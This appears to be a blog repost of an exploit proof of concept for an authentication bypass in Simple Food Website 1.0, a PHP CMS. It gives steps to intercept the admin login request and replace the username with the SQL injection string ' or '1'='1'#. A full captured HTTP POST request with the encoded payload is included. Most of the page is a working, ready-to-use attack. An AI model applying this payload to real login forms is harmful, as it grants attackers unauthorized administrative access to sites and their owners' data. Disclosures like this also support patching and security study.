Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86383586

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Simple Food Website 1.0 - Authentication Bypass
# Date: 2021-04-03
# Exploit Author: Viren Saroha (illusion)
# Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

POC

Step 1 -  Go to url http://localhost/food/admin/login.php
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in burpsuite
Step 4 – Change the username to ' or '1'='1'#
Step 5 – Click forward and now you will be logged in as admin.


REQUEST


POST /food/admin/process_login.php HTTP/1.1
Host: 192.168.132.128
Content-Length: 76
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.132.128
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.132.128/food/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=44189551c332ee92a95246aac0756dd3
Connection: close

username=%27+or+%271%27%3D%271%27%23&password=randomPassword&Sign+In=Sign+In